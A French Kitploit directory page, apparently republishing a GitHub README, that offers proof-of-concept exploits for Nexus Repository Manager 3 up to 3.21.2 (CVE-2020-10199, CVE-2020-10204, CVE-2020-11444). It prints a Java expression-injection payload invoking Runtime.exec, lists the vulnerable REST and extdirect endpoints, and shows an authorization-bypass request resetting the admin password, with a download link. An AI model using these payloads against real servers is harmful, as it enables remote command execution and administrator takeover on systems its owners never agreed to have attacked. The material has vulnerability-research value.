Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-10199 — CVE-2020-10199、CVE-2020-10204、CVE-2020-11444 | Kitploit
Outils/GitHubGitHub/jas502n/cve-2020-10199
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubjas502n/cve-2020-10199

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444

Voir le dépôt
359il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Nexus Repository Manager 3 Vuln (versions affectées : <= 3.21.2)

CVE-2020-10199, CVE-2020-10204, CVE-2020-11444

CVE-2020-10199 Exécution de commande à distance

POC avec réponse

POC sans réponse

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}

Permissions d'utilisateur standard

root@kitploit:~
/service/rest/beta/repositories/go/group

Nécessite les droits d'administrateur

  1. Créer une CleanupPolicy

/service/extdirect

  1. Créer des repositories

/service/rest/beta/repositories/apt/hosted

CVE-2020-10204 Exécution de commande à distance

  1. Utiliser l'interface de mise à jour utilisateur /service/extdirect
  2. Utiliser l'interface de création de rôle /service/extdirect

CVE-2020-11444 Vulnérabilité de contournement d'autorisations

Interface de mise à jour de rôle

root@kitploit:~
/service/rest/beta/security/users/admin/change-password

POST:
123456

Références

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus

Télécharger l’outil